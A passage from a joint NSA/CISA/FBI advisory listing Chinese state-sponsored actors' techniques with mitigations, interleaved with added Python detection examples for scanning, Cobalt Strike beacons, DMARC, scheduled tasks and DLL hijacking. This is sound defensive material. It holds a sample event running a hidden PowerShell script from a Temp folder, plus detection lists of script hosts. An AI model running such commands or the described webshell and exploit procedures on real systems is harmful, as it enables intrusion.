  • Use protection capabilities to stop malicious activity. Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary’s ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.

Resources

Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ for previous reporting on Chinese state-sponsored malicious cyber activity.

Disclaimer of Endorsement

The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Purpose

This document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov/tlp/.

Trademark Recognition

  • MITRE and ATT&CK are registered trademarks of The MITRE Corporation.
  • D3FEND is a trademark of The MITRE Corporation.
  • Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation.
  • Pulse Secure is a registered trademark of Pulse Secure, LLC.
  • Apache is a registered trademark of Apache Software Foundation.
  • F5 and BIG-IP are registered trademarks of F5 Networks.
  • Cobalt Strike is a registered trademark of Strategic Cyber LLC.
  • GitHub is a registered trademark of GitHub, Inc.
  • JavaScript is a registered trademark of Oracle Corporation.
  • Python is a registered trademark of Python Software Foundation.
  • Unix is a registered trademark of The Open Group.
  • Linux is a registered trademark of Linus Torvalds.
  • Dropbox is a registered trademark of Dropbox, Inc.

APPENDIX A: Chinese State-Sponsored Cyber Actors’ Observed Procedures

Note: D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.

Tactics: Reconnaissance [TA0043]    

Table 1: Chinese state-sponsored cyber actors’ Reconnaissance TTPs with detection and mitigation recommendations

Threat Actor
Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Active Scanning [T1595]

Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft® 365 (M365), formerly Office® 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python® scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization’s fully qualified domain name, IP address space, and open ports to target or exploit.

Minimize the amount and sensitivity of data available to external parties, for example: 

  • Scrub user email addresses and contact lists from public websites, which can be used for social engineering, 

  • Share only necessary data and information with third parties, and 

  • Monitor and limit third-party access to the network. 

Active scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.

Detect: 

Isolate: 

Gather Victim Network Information [T1590]
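The two detection points in this row (sources on a threat-intelligence feed, and the sweep pattern that automated scanning leaves in flow data) as an added Python example; this is not code from the advisory. The intel ranges and flow records are constructed from RFC 5737 documentation addresses, and the sweep threshold is an assumption to be tuned per environment.

```python
import ipaddress
from collections import defaultdict

# Constructed threat-intelligence feed of source networks to watch for. These
# are documentation ranges (RFC 5737), not real botnet or adversary
# infrastructure; populate the list from your own intel provider.
THREAT_INTEL_NETWORKS = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]

# Constructed flow records (src_ip, dst_ip, dst_port) of the kind a firewall
# log, NetFlow export or Zeek conn.log supplies for an Internet-facing segment.
# 203.0.113.7 probes many host/port pairs; 192.0.2.45 is on the feed.
SAMPLE_FLOWS = [
    ("192.0.2.45", "10.0.0.5", 443),
    ("192.0.2.45", "10.0.0.5", 22),
    ("203.0.113.7", "10.0.0.5", 80),
    ("203.0.113.7", "10.0.0.5", 443),
    ("203.0.113.7", "10.0.0.5", 445),
    ("203.0.113.7", "10.0.0.5", 3389),
    ("203.0.113.7", "10.0.0.6", 8080),
    ("203.0.113.7", "10.0.0.6", 8443),
    ("203.0.113.7", "10.0.0.7", 5985),
    ("203.0.113.7", "10.0.0.7", 25),
    ("203.0.113.7", "10.0.0.8", 21),
    ("203.0.113.7", "10.0.0.8", 23),
    ("198.18.0.9", "10.0.0.5", 443),   # a single ordinary connection
]


def in_threat_intel(ip: str) -> bool:
    """True when the address falls inside any network on the intel feed."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in THREAT_INTEL_NETWORKS)


def find_sweepers(flows, min_targets: int = 8) -> set:
    """Sources touching at least `min_targets` distinct (dst_ip, dst_port)
    pairs. A sweep across many ports or hosts from one source is the
    signature of automated active scanning."""
    targets = defaultdict(set)
    for src, dst, port in flows:
        targets[src].add((dst, port))
    return {src for src, t in targets.items() if len(t) >= min_targets}


def triage(flows, min_targets: int = 8) -> dict:
    """Map each source worth a closer look to the reasons it was flagged."""
    sweepers = find_sweepers(flows, min_targets)
    findings = {}
    for src in sorted({f[0] for f in flows}):
        reasons = []
        if in_threat_intel(src):
            reasons.append("threat-intel match")
        if src in sweepers:
            reasons.append("port/host sweep")
        if reasons:
            findings[src] = reasons
    return findings


if __name__ == "__main__":
    for src, why in triage(SAMPLE_FLOWS).items():
        print(f"{src}: {', '.join(why)}")
```

The intel match is cheap and high-confidence; the sweep heuristic is the one that catches scanners not yet on any feed, and its threshold should be set above what your own vulnerability scanners and monitoring systems generate.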

 

Tactics: Resource Development [TA0042]

Table II: Chinese state-sponsored cyber actors’ Resource Development TTPs with detection and mitigation recommendations

Threat Actor Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Acquire Infrastructure [T1583]

 

Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.

 

Adversary activities occurring outside the organization’s boundary of control and view make mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate them with other suspicious activity that may indicate an active threat.

 

N/A

Stage Capabilities [T1608]

Obtain Capabilities [T1588]

Chinese state-sponsored cyber actors have been observed using Cobalt Strike® and tools from GitHub® on victim networks. 

Organizations may be able to identify malicious use of Cobalt Strike by:

  • Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human-generated versus machine-generated traffic; machine-generated traffic will be more uniformly distributed.

  • Looking for the default Cobalt Strike TLS certificate.

  • Looking at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.

  • Reviewing the traffic destination domain, which may be malicious and an indicator of compromise.

  • Looking at the packet’s HTTP host header. If it does not match the destination domain, it may indicate a fake Cobalt Strike header and profile.

  • Checking the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike’s malleable C2 language. If discovered, additional recovery and investigation will be required.

 

N/A
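An added example (not from the advisory) that applies three of the checks listed above to constructed connection records: Host header versus SNI mismatch, a certificate-serial match, and the timing regularity that separates machine-generated beacons from human browsing. The serial and URI sets are labelled placeholders to be filled from your own intelligence, and the coefficient-of-variation threshold is an assumption.

```python
import statistics
from collections import defaultdict

# Placeholders: the advisory names these checks but gives no values, so fill
# them from your own threat intelligence. Nothing here is a real indicator.
KNOWN_BAD_CERT_SERIALS = {"PLACEHOLDER-DEFAULT-C2-CERT-SERIAL"}
KNOWN_C2_URI_PATHS = {"/placeholder-c2-path"}


def _conn(ts, client, sni, host, path, serial):
    return {"ts": ts, "client": client, "sni": sni, "host": host,
            "path": path, "serial": serial}


# Constructed HTTPS connection records as a TLS-inspecting proxy (or Zeek
# ssl.log joined to http.log) would emit: epoch seconds, client address, server
# name from the TLS SNI, HTTP Host header seen after decryption, request path,
# and the server certificate serial. 10.0.0.21 checks in about every 60 s with
# a Host header that disagrees with the SNI; 10.0.0.22 is a person browsing.
SAMPLE_CONNECTIONS = [
    _conn(t, "10.0.0.21", "update.example.org", "cdn.example.net", "/news",
          "PLACEHOLDER-DEFAULT-C2-CERT-SERIAL")
    for t in (0, 60, 121, 180, 241, 300, 360)
] + [
    _conn(t, "10.0.0.22", "www.example.com", "www.example.com", p, "1001")
    for t, p in ((5, "/"), (800, "/about"), (803, "/careers"),
                 (2400, "/"), (2410, "/contact"))
]


def host_header_mismatch(conn) -> bool:
    """A Host header that disagrees with the SNI suggests a malleable profile
    impersonating one site while the TLS session goes to another."""
    return conn["host"].lower() != conn["sni"].lower()


def beacon_regularity(conns, min_conns=5) -> dict:
    """Coefficient of variation of inter-connection gaps per (client, SNI).
    Beacons with a fixed sleep (plus small jitter) score near 0; human
    browsing is bursty and scores well above 0.5."""
    times = defaultdict(list)
    for c in conns:
        times[(c["client"], c["sni"])].append(c["ts"])
    scores = {}
    for key, ts in times.items():
        if len(ts) < min_conns:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean > 0:
            scores[key] = statistics.pstdev(gaps) / mean
    return scores


def triage(conns, max_cv=0.15) -> dict:
    """Map (client, SNI) pairs to the sorted list of checks they tripped."""
    findings = defaultdict(set)
    for c in conns:
        key = (c["client"], c["sni"])
        if host_header_mismatch(c):
            findings[key].add("host header does not match SNI")
        if c["serial"] in KNOWN_BAD_CERT_SERIALS:
            findings[key].add("known default C2 certificate")
        if c["path"] in KNOWN_C2_URI_PATHS:
            findings[key].add("URI matches C2 profile")
    for key, cv in beacon_regularity(conns).items():
        if cv <= max_cv:
            findings[key].add("regular beacon interval")
    return {k: sorted(v) for k, v in findings.items()}
```

None of the three checks is conclusive alone (CDNs legitimately produce Host/SNI differences, and software updaters poll on timers), which is why the output lists every check a pair tripped rather than a single verdict.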

Tactics: Initial Access [TA0001]

Table III: Chinese state-sponsored cyber actors’ Initial Access TTPs with detection and mitigation recommendations

Threat Actor Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Drive-by Compromise [T1189]

Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.

  • Ensure all browsers and plugins are kept up to date.
  • Use modern browsers with security features turned on.
  • Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript®, restrict browser extensions, etc.
  • Use adblockers to help prevent malicious code served through advertisements from executing. 
  • Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. 
  • Use browser sandboxes or remote virtual environments to mitigate browser exploitation.
  • Use security applications that look for behavior used during exploitation, such as Windows Defender® Exploit Guard (WDEG).

Detect: 

  • Identifier Analysis
  • File Analysis

Isolate: 

  • Execution Isolation
    • Hardware-based Process Isolation [D3-HBPI]
    • Executable Allowlisting [D3-EAL]
  • Network Isolation

Exploit Public-Facing Application [T1190]

Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[1] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources.
Chinese state-sponsored cyber actors have also been observed:

  • Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA®) and plant webshells.

  • Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.

  • Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.

Review previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.

Additional mitigations include:

  • Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.
  • Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).
  • Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.
  • Disable protocols using weak authentication.
  • Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [Embracing a Zero Trust Security Model].
  • When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).
  • Use automated tools to audit access logs for security concerns.
  • Where possible, enforce MFA for password resets.
  • Do not include Application Programming Interface (API) keys in software version control systems where they can be unintentionally leaked.

Harden:

  • Application Hardening [D3-AH]
  • Platform Hardening

Detect:

  • File Analysis [D3-FA]
  • Network Traffic Analysis
    • Client-server Payload Profiling [D3-CSPP]
  • Process Analysis 
    • Process Spawn Analysis
    • Process Lineage Analysis [D3-PLA]

Isolate: 

  • Network Isolation
    • Inbound Traffic Filtering [D3-ITF]

Phishing [T1566]

Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. 
These compromise attempts use the cyber actors’ dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment. 

  • Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and reinforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.
  • Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.
  • Block uncommon file types in emails that are not needed by general users (.exe, .jar, .vbs).
  • Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using DomainKeys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.
  • Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
  • Prevent users from clicking on malicious links by stripping hyperlinks or implementing “URL defanging” at the Email Security Gateway or other email security tools.
  • Add external sender banners to emails to alert users that the email came from an external sender.

Harden: 

  • Message Hardening
    • Message Authentication [D3-MAN]
    • Transfer Agent Authentication [D3-TAAN]

Detect: 

  • File Analysis
  • Identifier Analysis
  • Message Analysis
    • Sender MTA Reputation Analysis [D3-SMRA]
    • Sender Reputation Analysis [D3-SRA]
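The SPF/DKIM/DMARC bullet above describes the filtering decision in words; the following added example (not the advisory's code) makes the decision explicit for three constructed messages, including one from a typo-squatted sender. The DMARC records are an inline stand-in for the DNS lookup, and org_domain() is a simplification of the Public Suffix List logic a production gateway uses.

```python
import re

# Constructed DMARC records keyed by organizational domain: a stand-in for the
# DNS TXT lookup at _dmarc.<domain> that a real gateway performs.
DMARC_RECORDS = {
    "example.com": "v=DMARC1; p=reject; adkim=r; aspf=r",
    "example.org": "v=DMARC1; p=quarantine; adkim=s; aspf=s",
}


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict; alignment defaults to relaxed."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip().lower()
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags


def org_domain(domain: str) -> str:
    """Simplification: last two labels. Production code consults the Public
    Suffix List so that names such as example.co.uk are handled correctly."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict alignment needs an exact match; relaxed needs the same org domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def parse_auth_results(header: str) -> dict:
    """Pull the SPF and DKIM verdicts, and the domains they apply to, out of an
    Authentication-Results header."""
    out = {}
    m = re.search(r"spf=(\w+)\s+smtp\.mailfrom=([\w.-]+)", header)
    if m:
        out["spf"] = (m.group(1).lower(), m.group(2))
    m = re.search(r"dkim=(\w+)\s+header\.d=([\w.-]+)", header)
    if m:
        out["dkim"] = (m.group(1).lower(), m.group(2))
    return out


def evaluate_dmarc(from_header: str, auth_results: str) -> str:
    """Return 'pass', or the disposition (none/quarantine/reject) the From
    domain's DMARC policy requests when neither SPF nor DKIM is aligned."""
    m = re.search(r"@([\w.-]+)", from_header)
    if not m:
        return "none-no-from-domain"
    from_domain = m.group(1).lower()
    record = DMARC_RECORDS.get(org_domain(from_domain))
    if record is None:
        return "none-no-policy"
    policy = parse_dmarc(record)
    results = parse_auth_results(auth_results)
    spf = results.get("spf")
    dkim = results.get("dkim")
    spf_ok = spf is not None and spf[0] == "pass" and aligned(spf[1], from_domain, policy["aspf"])
    dkim_ok = dkim is not None and dkim[0] == "pass" and aligned(dkim[1], from_domain, policy["adkim"])
    if spf_ok or dkim_ok:
        return "pass"
    return policy.get("p",
                      "none")


# Constructed messages: (From header, Authentication-Results header).
SAMPLE_MESSAGES = [
    # Legitimate: SPF fails (forwarded) but DKIM is signed by the From domain.
    ("Alice <alice@example.com>",
     "mx.example.net; spf=fail smtp.mailfrom=bulk.example.com; dkim=pass header.d=example.com"),
    # Spoof: From claims example.com; SPF passes only for a typo-squatted domain.
    ("IT Helpdesk <helpdesk@example.com>",
     "mx.example.net; spf=pass smtp.mailfrom=examp1e.com; dkim=none"),
    # Strict alignment: a subdomain DKIM signature does not satisfy adkim=s.
    ("Bob <bob@example.org>",
     "mx.example.net; spf=none; dkim=pass header.d=mail.example.org"),
]
```

The second message is the case the advisory's typo-squatting note is about: SPF genuinely passes, but for the look-alike domain, and it is the alignment check against the visible From domain, not SPF alone, that causes the reject.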
       

External Remote Services [T1133]

Chinese state-sponsored cyber actors have been observed:

  • Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.

  • Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).

  • Exploiting Internet-accessible web servers using small webshell code injections against multiple languages, including .NET, ASP, ASPX, PHP, JSPX, and CFM.

Note: refer to the references listed above in Exploit Public-Facing Application [T1190] for information on CVEs known to be exploited by malicious Chinese cyber actors.

Note: this technique also applies to Persistence [TA0003].

  • Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.
  • Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.
  • Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).
  • Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.
  • Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.
  • Review and verify all connections between customer systems, service provider systems, and other client enclaves.

Harden:

Detect:

  • Network Traffic Analysis
    • Connection Attempt Analysis [D3-CAA]
  • Platform Monitoring [D3-PM]
  • Process Analysis
    • Process Spawn Analysis [D3-PSA]
      • Process Lineage Analysis [D3-PLA]

Valid Accounts [T1078]

Chinese state-sponsored cyber actors have been observed gaining credential access into victim networks by using legitimate, but compromised, credentials to access OWA servers, corporate login portals, and victim networks.

Note: this technique also applies to Persistence [TA0003], Privilege Escalation [TA0004], and Defense Evasion [TA0005].

  • Adhere to best practices for password and permission management.
  • Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only the systems they manage.
  • Do not store credentials or sensitive data in plaintext.
  • Change all default usernames and passwords.
  • Routinely update and secure applications using Secure Shell (SSH). 
  • Update SSH keys regularly and keep private keys secure.
  • Routinely audit privileged accounts to identify malicious use.

Harden: 

  • Credential Hardening
    • Multi-factor Authentication [D3-MFA]

Detect:

  • User Behavior Analysis [D3-UBA]
    • Authentication Event Thresholding [D3-ANET]
    • Job Function Access Pattern Analysis [D3-JFAPA]

Tactics: Execution [TA0002]

Table IV: Chinese state-sponsored cyber actors’ Execution TTPs with detection and mitigation recommendations

Threat Actor Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Command and Scripting Interpreter [T1059]

Chinese state-sponsored cyber actors have been observed:

  • Using cmd.exe, the JavaScript/JScript interpreter, and network device command line interpreters (CLI).

  • Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. 

  • Employing Python scripts to exploit vulnerable servers.

  • Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network.

PowerShell

  • Turn on PowerShell logging. (Note: this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)

  • Push PowerShell logs into a security information and event management (SIEM) tool.

  • Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.

  • Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.

  • Remove PowerShell if it is not necessary for operations. 

  • Restrict which commands can be used.

Windows Command Shell

  • Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. 

  • Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. 

  • Monitor for and investigate other unusual or suspicious scripting behavior. 

Unix

  • Use application controls to prevent execution.

  • Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. 

  • If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. 

Python

  • Audit inventory systems for unauthorized Python installations.

  • Blocklist Python where not required.

  • Prevent users from installing Python where not required.

JavaScript

  • Turn off or restrict access to unneeded scripting components.

  • Blocklist scripting where appropriate.

  • For malicious code served up through ads, adblockers can help prevent that code from executing.

Network Device Command Line Interface (CLI)

  • Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.

  • Use an authentication, authorization, and accounting (AAA) system to limit the actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.

  • Ensure least privilege principles are applied to user accounts and groups.

Harden: 

Detect: 

Isolate:

Scheduled Task/Job [T1053]

Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtasks or crontab, to create and schedule tasks that enumerate victim devices and networks.

Note: this technique also applies to Persistence [TA0003] and Privilege Escalation [TA0004].

  • Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity.
  • Configure event logging for scheduled task creation and monitor process execution from svchost.exe (Windows 10) and Windows Task Scheduler (older versions of Windows) to look for changes in %systemroot%\System32\Tasks that do not correlate with known software, patch cycles, or other administrative activity. Additionally, monitor for any scheduled tasks created via command-line utilities—such as PowerShell or Windows Management Instrumentation (WMI)—that do not conform to typical administrator or user actions.

Detect: 

  • Platform Monitoring
    • Operating System Monitoring [D3-OSM]
      • Scheduled Job Analysis [D3-SJA]
      • System Daemon Monitoring [D3-SDM]
      • System File Analysis [D3-SFA]

Isolate: 

  • Execution Isolation
    • Executable Allowlisting [D3-EAL]
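The two monitoring bullets above say what task creation should be correlated against; this added example (not from the advisory) does the correlation for constructed Security event 4698 records. The authorized creators, maintenance window and task folders are assumptions standing in for your own change-management baseline; the real event carries the task definition as XML in TaskContent, flattened here to a command and arguments.

```python
from datetime import datetime, time

# Environment-specific baselines, constructed for this example: the change
# accounts that legitimately create tasks, the nightly patch window, and the
# task folders your deployment tooling uses. Tune all three to your estate.
AUTHORIZED_TASK_CREATORS = {"svc_sccm", "patchadmin"}
MAINTENANCE_WINDOW = (time(1, 0), time(5, 0))
KNOWN_TASK_FOLDERS = ("\\Microsoft\\", "\\CorpIT\\")
SCRIPT_HOSTS = ("powershell", "pwsh", "wscript", "cscript", "mshta")
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Constructed Security log records. 4698 is "a scheduled task was created";
# 4702 is "a scheduled task was updated". The real 4698 carries the task
# definition as XML in TaskContent, flattened here to Command/Arguments.
SAMPLE_EVENTS = [
    {"EventID": 4698, "TimeCreated": "2021-07-13T02:10:00",
     "SubjectUserName": "svc_sccm", "TaskName": "\\CorpIT\\PatchReboot",
     "Command": "C:\\Windows\\System32\\shutdown.exe", "Arguments": "/r /t 300"},
    {"EventID": 4698, "TimeCreated": "2021-07-13T14:32:11",
     "SubjectUserName": "jsmith", "TaskName": "\\Update",
     "Command": "powershell.exe",
     "Arguments": "-w hidden -f C:\\Users\\jsmith\\AppData\\Local\\Temp\\u.ps1"},
    {"EventID": 4702, "TimeCreated": "2021-07-13T02:11:00",
     "SubjectUserName": "svc_sccm", "TaskName": "\\CorpIT\\PatchReboot",
     "Command": "C:\\Windows\\System32\\shutdown.exe", "Arguments": "/r /t 600"},
]


def triage_task_creation(event: dict) -> list:
    """Reasons a task-creation event fails to correlate with known activity;
    an empty list means it matched the baseline on every check."""
    if event.get("EventID") != 4698:
        return []
    reasons = []
    created = datetime.fromisoformat(event["TimeCreated"]).time()
    start, end = MAINTENANCE_WINDOW
    if not (start <= created <= end):
        reasons.append("outside maintenance window")
    if event["SubjectUserName"].lower() not in AUTHORIZED_TASK_CREATORS:
        reasons.append("creator not an authorized change account")
    if not event["TaskName"].startswith(KNOWN_TASK_FOLDERS):
        reasons.append("task name outside known folders")
    cmdline = f'{event["Command"]} {event["Arguments"]}'.lower()
    if any(host in cmdline for host in SCRIPT_HOSTS):
        reasons.append("task runs a scripting host")
    if any(p in cmdline for p in USER_WRITABLE):
        reasons.append("task runs content from a user-writable path")
    return reasons


def triage_all(events) -> dict:
    """TaskName -> reasons, for every creation event that tripped a check."""
    flagged = {}
    for event in events:
        reasons = triage_task_creation(event)
        if reasons:
            flagged[event["TaskName"]] = reasons
    return flagged
```

Each check on its own produces noise (developers create tasks at 14:32 too); the value is in the combination, and a task that trips all five is worth a human's attention regardless of which account created it.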

User Execution [T1204]

Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provides the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.

  • Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.
  • Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
  • Use a domain reputation service to detect and block suspicious or malicious domains.
  • Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
  • Ensure all browsers and plugins are kept up to date.
  • Use modern browsers with security features turned on.
  • Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.

Detect: 

  • File Analysis
  • Identifier Analysis
  • Network Traffic Analysis

Isolate: 

  • Execution Isolation
    • Hardware-based Process Isolation [D3-HBPI]
    • Executable Allowlisting [D3-EAL]
  • Network Isolation

Tactics: Persistence [TA0003]

Table V: Chinese state-sponsored cyber actors’ Persistence TTPs with detection and mitigation recommendations

Threat Actor Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Hijack Execution Flow [T1574]

Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. 

Note: this technique also applies to Privilege Escalation [TA0004] and Defense Evasion [TA0005].

  • Disallow loading of remote DLLs.
  • Enable safe DLL search mode.
  • Implement tools for detecting search order hijacking opportunities.
  • Use application allowlisting to block unknown DLLs.
  • Monitor the file system for created, moved, and renamed DLLs.
  • Monitor for changes in system DLLs not associated with updates or patches.
  • Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).

Detect: 

  • Platform Monitoring
    • Operating System Monitoring
      • Service Binary Verification [D3-SBV]
  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA]

Isolate: 

  • Execution Isolation
    • Executable Allowlisting [D3-EAL]
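An added example, not code from the advisory, for the last three bullets above: given constructed image-load events in the shape of Sysmon Event ID 7, it flags a system DLL name loaded from outside the system directories, a DLL pulled from a UNC path, and an unsigned DLL outside the system directories. The list of system DLL names is an assumed baseline.

```python
import ntpath

# Directories from which system DLLs are expected to load. Anything else is,
# for these names, a search-order hijack candidate.
SYSTEM_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                   "c:\\windows\\winsxs\\")

# Assumed baseline of DLL names that legitimate software on this estate only
# ever loads from the system directories. Build yours from a clean baseline
# period rather than this short list.
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "wininet.dll",
                    "cryptbase.dll", "userenv.dll"}

# Constructed image-load events in the shape of Sysmon Event ID 7 (Image,
# ImageLoaded, Signed), trimmed to the fields the checks need.
SAMPLE_IMAGE_LOADS = [
    {"process": r"C:\Program Files\Vendor\app.exe",
     "image": r"C:\Windows\System32\version.dll", "signed": True},
    # same DLL name, but sitting next to the executable that loads it
    {"process": r"C:\Program Files\Vendor\app.exe",
     "image": r"C:\Program Files\Vendor\version.dll", "signed": False},
    # a system DLL name served from a file share
    {"process": r"C:\Users\jsmith\Downloads\viewer.exe",
     "image": r"\\fileserver\share\dbghelp.dll", "signed": False},
    # the vendor's own signed library: nothing to report
    {"process": r"C:\Program Files\Vendor\app.exe",
     "image": r"C:\Program Files\Vendor\vendorcore.dll", "signed": True},
]


def analyze_image_load(event: dict) -> list:
    """Reasons this DLL load looks like search-order hijacking; [] if none."""
    image = event["image"].lower()
    name = ntpath.basename(image)
    directory = ntpath.dirname(image).rstrip("\\") + "\\"
    in_system_dir = directory.startswith(SYSTEM_DLL_DIRS)
    reasons = []
    if image.startswith("\\\\"):
        reasons.append("DLL loaded from a remote (UNC) path")
    if name in SYSTEM_DLL_NAMES and not in_system_dir:
        reasons.append("system DLL name loaded from a non-system directory")
    if not event["signed"] and not in_system_dir:
        reasons.append("unsigned DLL outside system directories")
    return reasons


def hijack_candidates(events) -> dict:
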